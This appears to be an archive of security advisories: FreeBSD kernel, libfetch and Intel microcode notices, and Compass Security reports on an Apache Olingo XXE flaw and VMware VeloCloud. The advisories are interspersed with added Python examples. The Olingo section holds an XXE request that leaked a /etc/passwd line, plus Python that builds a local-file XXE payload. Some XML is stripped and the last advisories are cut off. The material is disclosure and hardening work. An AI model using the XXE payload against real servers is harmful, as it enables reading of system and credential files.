FreeBSD Security Advisory FreeBSD-SA-20:02.ipsec

2020-01-29 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:02.ipsec                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Missing IPsec anti-replay window check

Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Jean-Francois HREN
Affects:        FreeBSD 12.0 only
Corrected:      2020-01-28 18:56:46 UTC (releng/12.0, 12.0-RELEASE-p13)
CVE Name:       CVE-2019-5613

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

IPsec is a suite of protocols providing data authentication, integrity, and
confidentiality between two networked hosts.

II.  Problem Description

The anti-replay window check is missing from the IPsec receive path, so an
attacker can reinject a previously captured packet and it will be accepted
and processed by the IPsec endpoint as if it were new.

III. Impact

The impact depends on the higher-level protocols in use over IPsec.  For
example, an attacker who can capture and inject packets could cause an action
that was intentionally performed once to be repeated.
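
For reference, the check a receiver has to perform here is the sliding-window
anti-replay test of RFC 4303 Appendix A. What follows is an added example in
Python, not FreeBSD's IPsec code: a window of 64 sequence numbers tracks the
highest number accepted so far plus a bitmap of the recent ones, so a
reinjected packet is rejected as a duplicate and anything older than the
window is dropped as undecidable. The minimum width of 32 and the rule that
sequence number 0 is never accepted come from RFC 4303; the packet streams in
the demonstration are constructed.

```python
"""Sliding-window anti-replay check as specified in RFC 4303 Appendix A.

Added example, not FreeBSD's IPsec implementation.  `highest` is the largest
sequence number accepted so far and bit i of `bitmap` records whether
`highest - i` has already been accepted, so the window covers the `width`
most recent sequence numbers.
"""


class ReplayWindow:
    def __init__(self, width: int = 64):
        if width < 32:
            raise ValueError("RFC 4303 requires a window of at least 32 packets")
        self.width = width
        self.highest = 0
        self.bitmap = 0

    def check(self, seq: int) -> bool:
        """True if seq may be accepted: newer than the window, or inside it and unseen."""
        if seq <= 0 or seq > 0xFFFFFFFF:
            return False                       # seq 0 is never valid on the wire (RFC 4303 3.3.3)
        if seq > self.highest:
            return True                        # to the right of the window: always fresh
        diff = self.highest - seq
        if diff >= self.width:
            return False                       # left of the window: too old to tell, drop
        return not (self.bitmap >> diff) & 1   # inside the window: fresh unless already marked

    def update(self, seq: int) -> None:
        """Mark seq as accepted.  Only call after check() passed AND the packet's
        integrity check (ICV) succeeded; advancing the window on unauthenticated
        packets would let an attacker push legitimate traffic out of it."""
        if seq > self.highest:
            shift = seq - self.highest
            if shift >= self.width:
                self.bitmap = 1                # the old window is entirely stale
            else:
                self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.width) - 1)
            self.highest = seq
        else:
            self.bitmap |= 1 << (self.highest - seq)

    def receive(self, seq: int) -> bool:
        """Receiver path for an authenticated packet: check, then update."""
        if not self.check(seq):
            return False
        self.update(seq)
        return True


def verdicts(sequence, width: int = 64):
    """Run a constructed stream of sequence numbers through one window."""
    window = ReplayWindow(width)
    return [window.receive(s) for s in sequence]


if __name__ == "__main__":
    # Packet 2 captured and reinjected after packet 3: the last verdict is a reject.
    print(verdicts([1, 2, 3, 2]))
```

The ordering in `receive` is the part that matters operationally: the window
must only be advanced by packets whose ICV verified, otherwise forged packets
with large sequence numbers can slide the window past genuine traffic.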

IV.  Workaround

No workaround is available.  Systems not using IPsec are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch
# fetch https://security.FreeBSD.org/patches/SA-20:02/ipsec.patch.asc
# gpg --verify ipsec.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                    Revision
-------------------------------------------------------------------------
releng/12.0/                                                   r357218
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5613>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-20:02.ipsec.asc>


FreeBSD Security Advisory FreeBSD-SA-20:01.libfetch

2020-01-29 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:01.libfetch                                   Security Advisory
                                                          The FreeBSD Project

Topic:          libfetch buffer overflow

Category:       core
Module:         libfetch
Announced:      2020-01-28
Credits:        Duncan Overbruck
Affects:        All supported versions of FreeBSD.
Corrected:      2020-01-28 18:40:55 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:55:25 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:55:25 UTC (releng/12.0, 12.0-RELEASE-p13)
                2020-01-28 18:42:06 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:55:25 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2020-7450

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

libfetch(3) is a multi-protocol file transfer library included with FreeBSD
and used by the fetch(1) command-line tool, pkg(8) package manager, and
others.

II.  Problem Description

A programming error allows an attacker who can specify a URL with username
and/or password components to overflow libfetch(3) buffers.

III. Impact

An attacker in control of the URL to be fetched (possibly via HTTP redirect)
may cause a heap buffer overflow, resulting in program misbehavior or
malicious code execution.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch
# fetch https://security.FreeBSD.org/patches/SA-20:01/libfetch.patch.asc
# gpg --verify libfetch.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                    Revision
-------------------------------------------------------------------------
stable/12/                                                     r357213
releng/12.1/                                                   r357217
releng/12.0/                                                   r357217
stable/11/                                                     r357214
releng/11.3/                                                   r357217
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7450>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-20:01.libfetch.asc>


FreeBSD Security Advisory FreeBSD-SA-20:03.thrmisc

2020-01-29 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-20:03.thrmisc                                    Security Advisory
                                                          The FreeBSD Project

Topic:          kernel stack data disclosure

Category:       core
Module:         kernel
Announced:      2020-01-28
Credits:        Ilja Van Sprundel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-15 16:40:10 UTC (stable/12, 12.1-STABLE)
                2020-01-28 18:57:45 UTC (releng/12.1, 12.1-RELEASE-p2)
                2020-01-28 18:57:45 UTC (releng/12.0, 12.0-RELEASE-p13)
                2019-11-15 16:40:55 UTC (stable/11, 11.3-STABLE)
                2020-01-28 18:57:45 UTC (releng/11.3, 11.3-RELEASE-p6)
CVE Name:       CVE-2019-15875

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

When a process crashes, the kernel can write a core dump file containing the
process state, for debugging.

II.  Problem Description

Due to incorrect initialization of a stack data structure, up to 20 bytes of
kernel data previously stored on the kernel stack are written into the core
dump of a crashing user process, where the owner of that process can read
them.

III. Impact

Sensitive kernel data may be disclosed.

IV.  Workaround

Core dumps may be disabled by setting the kern.coredump sysctl to 0.
See sysctl(8) and sysctl.conf(5).

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch
# fetch https://security.FreeBSD.org/patches/SA-20:03/thrmisc.patch.asc
# gpg --verify thrmisc.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                    Revision
-------------------------------------------------------------------------
stable/12/                                                     r354734
releng/12.1/                                                   r357219
releng/12.0/                                                   r357219
stable/11/                                                     r354735
releng/11.3/                                                   r357219
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15875>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-20:03.thrmisc.asc>


CVE-2019-17554 - Apache Olingo OData 4.0 - XML External Entity Resolution (XXE)

2019-12-10 Thread Advisories
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  Apache Olingo OData 4.0
# Vendor:   Apache Foundation
# CSNC ID:  CSNC-2019-025
# CVE ID:   CVE-2019-17554
# Subject:  XML External Entity Resolution (XXE)
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Archibald Haddock (advisor...@compass-security.com)
# Date:     08.11.2019
#
#############################################################

Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData)
[1]. XML data is parsed by insecurely configured software components, which
can be abused for XML External Entity attacks [2].



Affected:
---------
Vulnerable:
 * Olingo OData 4.x.x to 4.6.x

Not vulnerable:
 * Olingo OData 4.7.0
 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01

Technical Description
---------------------
The XML content-type entity deserializer is not configured to deny the
resolution of external entities. Requests with content type
"application/xml" that trigger the deserialization of entities can therefore
be used to mount XXE attacks.

Request
=======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 
Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101


]>
http://www.w3.org/2005/Atom; 
xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; 
xmlns:d="http://docs.oasis-open.org/odata/ns/data; 
m:context="$metadata#Cars/$entity">
  Cars(1)
  
  
  2019-11-08T15:10:30Z
  

  
  
  http://docs.oasis-open.org/odata/ns/related/Manufacturer; 
type="application/atom+xml;type=feed" title="Manufacturer" 
href="Cars(1)/Manufacturer">
  http://docs.oasis-open.org/odata/ns/scheme; 
term="#olingo.odata.sample.Car">
  

  1
  F1 
  2012
  189189.43
  EUR

  


Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close

http://www.w3.org/2005/Atom; 
xmlns:m="http://docs.oasis-open.org/odata/ns/metadata; 
xmlns:d="http://docs.oasis-open.org/odata/ns/data; 
m:context="$metadata#Cars">Cars(1)2019-11-08T15:22:35Zhttp://docs.oasis-open.org/odata/ns/related/Manufacturer; 
type="application/atom+xml;type=feed" title="Manufacturer" 
href="Cars(1)/Manufacturer">http://docs.oasis-open.org/odata/ns/scheme; 
term="#olingo.odata.sample.Car">1
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
2012189189.43EUR


Workaround / Fix:
-----------------
Configure the XML reader securely [3].

In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on
line 70 a javax.xml.stream.XMLInputFactory is instantiated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();

The XMLInputFactory should be configured not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

Disabling DTD support rejects any document that carries a DOCTYPE, which also
removes internal entity expansion as a vector; turning off external entity
support is the narrower control and is worth keeping as well in case the DTD
setting is later relaxed.
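
The same two configurations seen from the parser's side, as an added example
that is not Olingo code: it uses Python's xml.sax in place of the Java StAX
factory, since the behaviour is the same in kind. With external general
entities enabled (the counterpart of the factory's default) the entity in
d:Model is replaced by the contents of the referenced file; with them disabled
the reference is skipped and the rest of the entry still parses. The secret
file and the Atom-style request body are constructed here, and the file stands
in for /etc/passwd.

```python
"""External-entity resolution on versus off, demonstrated with Python's xml.sax.
Added example, not Olingo code: xml.sax stands in for the Java StAX factory.
The secret file and the Atom-style request body are constructed here."""

import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collect character data so we can see what the parser inlined."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse attacker-controlled XML and return its text content.

    resolve_external_entities=True is the vulnerable configuration: SYSTEM
    entities are fetched and inlined.  False is the hardened one, the analogue
    of XMLInputFactory.SUPPORT_DTD=false / isSupportingExternalEntities=false.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_payload(path: str) -> bytes:
    """Constructed OData Atom entry whose d:Model property references a local file."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE entry [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<entry xmlns="http://www.w3.org/2005/Atom"\n'
        '       xmlns:d="http://docs.oasis-open.org/odata/ns/data"\n'
        '       xmlns:m="http://docs.oasis-open.org/odata/ns/metadata">\n'
        '  <content type="application/xml">\n'
        '    <m:properties><d:Id>1</d:Id><d:Model>F1 &xxe;</d:Model></m:properties>\n'
        '  </content>\n'
        '</entry>\n' % path
    ).encode()


def demo() -> dict:
    """Run one payload through both configurations and report whether the secret leaked."""
    secret = "myuser:x:1000:1000:,,,:/home/myuser:/bin/bash"   # stands in for /etc/passwd
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret + "\n")
        path = f.name
    try:
        vulnerable_text = parse_untrusted(xxe_payload(path), resolve_external_entities=True)
        hardened_text = parse_untrusted(xxe_payload(path), resolve_external_entities=False)
    finally:
        os.unlink(path)
    return {
        "vulnerable_leaks": secret in vulnerable_text,
        "hardened_leaks": secret in hardened_text,
        "hardened_still_parses": "F1 " in hardened_text,
    }


if __name__ == "__main__":
    print(demo())
```

Note that the hardened run does not fail loudly: the unresolved entity is
silently dropped. A deployment that wants to notice probing should therefore
also log or reject any request body that carries a DOCTYPE at all.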


Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed Version / Patch [4]
2019-12-05: Coordinated public disclosure date


[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E

Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt


FreeBSD Security Advisory FreeBSD-SA-19:25.mcepsc

2019-11-12 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:25.mcepsc                                     Security Advisory
                                                          The FreeBSD Project

Topic:          Machine Check Exception on Page Size Change

Category:       core
Module:         kernel
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD.
Corrected:      2019-11-12 18:03:26 UTC (stable/12, 12.1-STABLE)
                2019-11-12 18:13:04 UTC (releng/12.1, 12.1-RELEASE-p1)
                2019-11-12 18:13:04 UTC (releng/12.0, 12.0-RELEASE-p12)
                2019-11-12 18:04:28 UTC (stable/11, 11.3-STABLE)
                2019-11-12 18:13:04 UTC (releng/11.3, 11.3-RELEASE-p5)
CVE Name:       CVE-2018-12207

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Intel machine check architecture is a mechanism to detect and report
hardware errors, such as system bus errors, ECC errors, parity errors, and
others.  This allows the processor to signal the detection of a machine
check error to the operating system.

II.  Problem Description

Intel discovered that a previously published erratum on some Intel platforms
can be exploited by malicious software to cause a denial of service, by
triggering a machine check that crashes or hangs the system.

III. Impact

Malicious guest operating systems may be able to crash the host.

IV.  Workaround

No workaround is available.  Systems not running untrusted guest virtual
machines are not impacted.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for a security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.1]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.1.patch.asc
# gpg --verify mcepsc.12.1.patch.asc

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.12.0.patch.asc
# gpg --verify mcepsc.12.0.patch.asc

[FreeBSD 11.3]
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:25/mcepsc.11.patch.asc
# gpg --verify mcepsc.11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                    Revision
-------------------------------------------------------------------------
stable/12/                                                     r354650
releng/12.1/                                                   r354653
releng/12.0/                                                   r354653
stable/11/                                                     r354651
releng/11.3/                                                   r354653
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://software.intel.com/security-software-guidance/software-guidance/machine-check-error-avoidance-page-size-change>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12207>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:25.mcepsc.asc>

FreeBSD Security Advisory FreeBSD-SA-19:26.mcu

2019-11-12 Thread FreeBSD Security Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:26.mcu                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Intel CPU Microcode Update

Category:       3rd party
Module:         Intel CPU microcode
Announced:      2019-11-12
Credits:        Intel
Affects:        All supported versions of FreeBSD running on certain
                Intel CPUs.
CVE Name:       CVE-2019-11135, CVE-2019-11139, CVE-2018-12126,
                CVE-2018-12127, CVE-2018-12130, CVE-2018-11091,
                CVE-2017-5715


For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

From time to time Intel releases new CPU microcode to address functional
issues and security vulnerabilities.  Such a release is also known as a
Micro Code Update (MCU), and is a component of a broader Intel Platform
Update (IPU).  FreeBSD distributes CPU microcode via the devcpu-data port
and package.

II.  Problem Description

Starting with version 1.26, the devcpu-data port/package includes updates and
mitigations for the following technical and security advisories (depending
on CPU model).

Intel TSX Updates (TAA)                 CVE-2019-11135
Voltage Modulation Vulnerability        CVE-2019-11139
MD_CLEAR Operations                     CVE-2018-12126
                                        CVE-2018-12127
                                        CVE-2018-12130
                                        CVE-2018-11091
TA Indirect Sharing                     CVE-2017-5715
EGETKEY                                 CVE-2018-12126
                                        CVE-2018-12127
                                        CVE-2018-12130
                                        CVE-2018-11091
JCC                                     SKX102 Erratum

Updated microcode includes mitigations for CPU issues, but may also cause a
performance regression due to the JCC erratum mitigation.  Please visit
http://www.intel.com/benchmarks for further information.

Please visit http://www.intel.com/security for detailed information on
these advisories as well as a list of CPUs that are affected.

III. Impact

Operating a CPU without the latest microcode may result in erratic or
unpredictable behavior, including system crashes and lock ups.  Certain
issues listed in this advisory may result in the leakage of privileged
system information to unprivileged users.  Please refer to the security
advisories listed above for detailed information.

IV.  Workaround

To determine if TSX is present in your system, run the following:

1. kldload cpuctl

2. cpucontrol -i 7 /dev/cpuctl0

If bits 4 (0x10) and 11 (0x800) are set in the second response word (EBX),
TSX is present.

In the absence of updated microcode, TAA can be mitigated by enabling the
MDS mitigation:

3. sysctl hw.mds_disable=1

Systems must be running FreeBSD 11.3, FreeBSD 12.1, or later for this to
work.

*IMPORTANT*
If your use case can tolerate leaving the CPU issues unmitigated and cannot
tolerate a performance regression, ensure that the devcpu-data package is
not installed or is locked at 1.25 or earlier.

# pkg delete devcpu-data

or

# pkg lock devcpu-data

Later versions of the LLVM and GCC compilers will include changes that
partially relieve the performance impact.

V.   Solution

Install the latest Intel Microcode Update via the devcpu-data port/package,
version 1.26 or later.

Updated microcode adds the ability to disable TSX.  With updated microcode
the issue can still be mitigated by enabling the MDS mitigation as
described in the workaround section, or by disabling TSX instead:

1. kldload cpuctl

2. cpucontrol -i 7 /dev/cpuctl0

If bit 29 (0x20000000) is set in the fourth response word (EDX), then the
IA32_ARCH_CAPABILITIES MSR (0x10a) is present.

3. cpucontrol -m 0x10a /dev/cpuctl0

If bit 8 (0x100) of the response word is set, your CPU is not vulnerable to
TAA and no further action is required.

If bit 7 (0x80) is cleared, then your CPU does not have updated microcode
that facilitates TSX to be disabled.  The only remedy available is to
enable the MDS mitigation, as documented above.

4. cpucontrol -m 0x122=3 /dev/cpuctl0

Repeat step 4 for each numbered CPU that is present.
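
To automate the decisions in the workaround and solution steps above, the
following added example (Python, not FreeBSD code) decodes the cpucontrol(8)
output and returns which remedy applies. It assumes cpucontrol prints
`cpuid level 0x7: <eax> <ebx> <ecx> <edx>` for `-i 7` and
`MSR 0x10a: <high word> <low word>` for `-m 0x10a`; check that against your
cpucontrol version, and note that the sample lines are constructed rather than
captured from a host. It treats TSX as present if either the HLE (bit 4) or
the RTM (bit 11) bit is set, slightly more general than requiring both, since
RTM-only parts exist; the mask for EDX bit 29 is 0x20000000.

```python
"""Decode cpucontrol(8) output for the TAA procedure above and pick the remedy.
Added example, not FreeBSD code.  Assumed output formats (check against your
cpucontrol version):
    cpucontrol -i 7 /dev/cpuctl0     -> cpuid level 0x7: 0x<eax> 0x<ebx> 0x<ecx> 0x<edx>
    cpucontrol -m 0x10a /dev/cpuctl0 -> MSR 0x10a: 0x<high 32 bits> 0x<low 32 bits>
The sample lines in main are constructed, not captured from a real host."""

import re

CPUID7_EBX_HLE = 1 << 4          # 0x10
CPUID7_EBX_RTM = 1 << 11         # 0x800
CPUID7_EDX_ARCH_CAP = 1 << 29    # 0x20000000: IA32_ARCH_CAPABILITIES (MSR 0x10a) implemented
ARCH_CAP_TSX_CTRL = 1 << 7       # 0x80: IA32_TSX_CTRL (MSR 0x122) present, TSX can be disabled
ARCH_CAP_TAA_NO = 1 << 8         # 0x100: CPU is not affected by TAA

_CPUID_RE = re.compile(
    r"cpuid level 0x([0-9a-f]+):\s+0x([0-9a-f]+)\s+0x([0-9a-f]+)\s+0x([0-9a-f]+)\s+0x([0-9a-f]+)",
    re.IGNORECASE)
_MSR_RE = re.compile(r"MSR 0x([0-9a-f]+):\s+0x([0-9a-f]+)\s+0x([0-9a-f]+)", re.IGNORECASE)


def parse_cpuid7(line: str):
    """Return (eax, ebx, ecx, edx) from a `cpucontrol -i 7` line."""
    m = _CPUID_RE.match(line.strip())
    if m is None or int(m.group(1), 16) != 7:
        raise ValueError("expected a 'cpuid level 0x7' line, got: %r" % line)
    return tuple(int(g, 16) for g in m.groups()[1:])


def parse_msr(line: str, expected: int) -> int:
    """Return the 64-bit value from a `cpucontrol -m` line (high word printed first)."""
    m = _MSR_RE.match(line.strip())
    if m is None or int(m.group(1), 16) != expected:
        raise ValueError("expected an 'MSR 0x%x' line, got: %r" % (expected, line))
    return (int(m.group(2), 16) << 32) | int(m.group(3), 16)


def taa_action(cpuid7_line: str, msr10a_line: str = None) -> str:
    """Walk the advisory's decision steps for one CPU.

    Returns 'no_tsx' (TAA not applicable), 'not_vulnerable' (TAA_NO set),
    'disable_tsx' (updated microcode: write 3 to MSR 0x122) or 'enable_mds'
    (no TSX_CTRL available: fall back to hw.mds_disable=1).
    """
    _, ebx, _, edx = parse_cpuid7(cpuid7_line)
    # TSX present if either HLE or RTM is advertised (RTM-only parts exist).
    if not ebx & (CPUID7_EBX_HLE | CPUID7_EBX_RTM):
        return "no_tsx"
    # Without IA32_ARCH_CAPABILITIES there is no TSX_CTRL/TAA_NO bit to consult.
    if not edx & CPUID7_EDX_ARCH_CAP or msr10a_line is None:
        return "enable_mds"
    caps = parse_msr(msr10a_line, 0x10A)
    if caps & ARCH_CAP_TAA_NO:
        return "not_vulnerable"
    if caps & ARCH_CAP_TSX_CTRL:
        return "disable_tsx"
    return "enable_mds"


def remediation_commands(action: str, ncpu: int):
    """Commands to run for the chosen action; TSX must be disabled on every CPU."""
    if action == "disable_tsx":
        return ["cpucontrol -m 0x122=3 /dev/cpuctl%d" % i for i in range(ncpu)]
    if action == "enable_mds":
        return ["sysctl hw.mds_disable=1"]
    return []


if __name__ == "__main__":
    cpuid = "cpuid level 0x7: 0x00000000 0x00000810 0x00000000 0x20000000"  # constructed
    msr = "MSR 0x10a: 0x00000000 0x00000080"                                # constructed
    action = taa_action(cpuid, msr)
    print(action, remediation_commands(action, 2))
```

The MSR value is assembled as high word then low word because that is the
order the `-m` output is assumed to print; if your cpucontrol prints a single
64-bit value, adjust `parse_msr` and nothing else.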

A future kernel change to FreeBSD will provide automatic detection and
mitigation for TAA.

LLVM 9.0 will be updated in FreeBSD 13-current to address the JCC
performance impact.  Updates to prior versions of LLVM are currently being
evaluated.

VI.  Correction details

There are currently no changes in FreeBSD to address this issue.

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139>
https://cve.

CVE-2019-5533 - VMware VeloCloud Authorization Bypass

2019-10-16 Thread Advisories
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  VeloCloud
# Vendor:   VMware
# CVE ID:   CVE-2019-5533
# CSNC ID:  CSNC-2019-007
# Subject:  Authorization Bypass
# Risk:     Moderate
# Effect:   Remotely exploitable
# CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
# Author:   Silas Bärtsch
# Date:     10.16.2019
#
#############################################################

Introduction:
-------------
